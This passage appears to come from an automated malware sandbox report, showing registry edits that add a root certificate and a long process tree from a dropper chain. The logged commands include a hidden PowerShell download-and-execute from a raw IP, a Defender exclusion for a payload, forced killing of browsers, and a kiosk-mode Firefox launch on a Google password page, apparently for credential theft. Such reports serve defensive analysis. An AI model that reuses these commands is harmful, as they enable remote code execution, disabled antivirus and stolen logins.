261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe
"C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2EED.tmp\2EEE.tmp\2EEF.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
"C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"
C:\Users\Admin\AppData\Local\Temp\dll32.exe
"C:\Users\Admin\AppData\Local\Temp\dll32.exe"
C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10107211121\PcAIvJ0.cmd"
C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 1204
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 1016
C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2052 -s 500
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp2961.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp2961.tmp.bat
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\8QpbZ8u9\Anubis.exe""
C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\onefile_1616_133856873851862000\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe
"C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Users\Admin\AppData\Local\Temp\dll32.exe
"C:\Users\Admin\AppData\Local\Temp\dll32.exe"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe
"C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 1200
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe
"C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe
"C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.0.1337352138\1171607553" -parentBuildID 20221007134813 -prefsHandle 1244 -prefMapHandle 1196 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd1ffbe0-fde8-41f7-b9f5-a2e143d89b2a} 300 "\\.\pipe\gecko-crash-server-pipe.300" 1324 106dbe58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.1.971295469\132527329" -parentBuildID 20221007134813 -prefsHandle 1540 -prefMapHandle 1536 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c80145c5-498f-4946-8dad-2f2b8108cd90} 300 "\\.\pipe\gecko-crash-server-pipe.300" 1552 f3eb258 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.2.1791177149\199354410" -childID 1 -isForBrowser -prefsHandle 2208 -prefMapHandle 2204 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a58b41a8-2a8b-4824-ab7a-c6cedf00c3b9} 300 "\\.\pipe\gecko-crash-server-pipe.300" 2220 175d9258 tab
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.3.1120652361\535779563" -childID 2 -isForBrowser -prefsHandle 2704 -prefMapHandle 2640 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5a22e55-3f41-49f6-9837-3c5a9ea8369b} 300 "\\.\pipe\gecko-crash-server-pipe.300" 2776 1d70a658 tab
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.4.1509203630\1168830996" -childID 3 -isForBrowser -prefsHandle 3660 -prefMapHandle 3768 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {761025cf-1ac0-4ad9-91e7-7c0357446cb6} 300 "\\.\pipe\gecko-crash-server-pipe.300" 3796 e69758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.5.1702620004\829867254" -childID 4 -isForBrowser -prefsHandle 3904 -prefMapHandle 3908 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5a7969e-1401-43b1-b1cd-37389839b617} 300 "\\.\pipe\gecko-crash-server-pipe.300" 3892 1b84d658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.6.705501292\1687976917" -childID 5 -isForBrowser -prefsHandle 4064 -prefMapHandle 4068 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {90f30b2a-17ac-4871-b956-62a0716fd10e} 300 "\\.\pipe\gecko-crash-server-pipe.300" 4052 1b84dc58 tab
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp1065.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp1065.tmp.bat
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe
"C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe
"C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
